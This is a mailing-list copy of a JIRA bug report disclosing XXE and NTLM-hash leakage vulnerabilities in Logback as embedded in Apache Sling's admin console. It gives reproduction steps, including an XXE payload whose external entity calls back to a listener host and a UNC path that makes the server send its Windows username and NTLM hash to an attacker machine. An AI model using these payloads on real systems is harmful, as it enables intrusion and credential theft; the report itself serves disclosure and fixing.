[logback-dev] [JIRA] (LOGBACK-1465) xxe and Information disclosure vulnerabilities in Logback

Thu, 09 May 2019 00:51:56 -0700 

shuiboye created LOGBACK-1465:
---------------------------------

             Summary: xxe and Information disclosure vulnerabilities in Logback
                 Key: LOGBACK-1465
                 URL: https://jira.qos.ch/browse/LOGBACK-1465
             Project: logback
          Issue Type: Bug
          Components: logback-core
         Environment: I test Apache Sling latest version 11 integrating Logback 
running on windows system 
            Reporter: shuiboye
            Assignee: Logback dev list
            Priority: Critical
         Attachments: image-2019-05-09-15-41-28-419.png, 
image-2019-05-09-15-41-45-829.png, image-2019-05-09-15-43-09-668.png, 
image-2019-05-09-15-43-25-103.png

Hi,I find xxe and Information disclosure vulnerabilities in Logback when 
testing Apache Sling latest version 11 integrating Logback.

First I login in Sling as an admin.
*xxe*
The vulnerable url is 
[http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the " Logback Config File "  field,I input "\\192.168.0.102\c$\xxe.xml" as 
shown below.
!image-2019-05-09-15-43-09-668.png!
The content of the xxe.xml under c:\  directory on the server 192.168.0.102 is 
{quote}{quote}<?xml version="1.0"?>{quote}
{quote}<!DOCTYPE r [{quote}
{quote}<!ENTITY % sp SYSTEM "[http://192.168.0.102:8090/sling]";>{quote}
{quote}%sp;{quote}
{quote}]>{quote}{quote}
 
 After click "save"  ,the netcat running on the server  192.168.0.102 and 
listening to the port 8090 receives the request as shown below.
!image-2019-05-09-15-43-25-103.png!
 
*information disclosure(Windows username and NTLM password hash)*
The vulnerable url is 
[http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
To ensure that the " Logback Config File " can result in the server's Windows 
username and NTLM password hash being leaked to remote attackers through SMB,I 
use another machine to visit the vulnerable page whose url is also 
[http://192.168.0.102:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager].
In the " Logback Config File "  field,I input "\\192.168.9.128\test".The ip 
192.168.9.128 is anthoer machine used to capture smb.
!image-2019-05-09-15-41-28-419.png!
After click "save"  ,the machine whose ip is 192.168.9.128 successfully 
captures the Windows username and NTLM password hash through SMB.
 
!image-2019-05-09-15-41-45-829.png!



--
This message was sent by Atlassian JIRA
(v7.3.1#73012)
_______________________________________________
logback-dev mailing list
logback-dev@qos.ch
http://mailman.qos.ch/mailman/listinfo/logback-dev

Reply via email to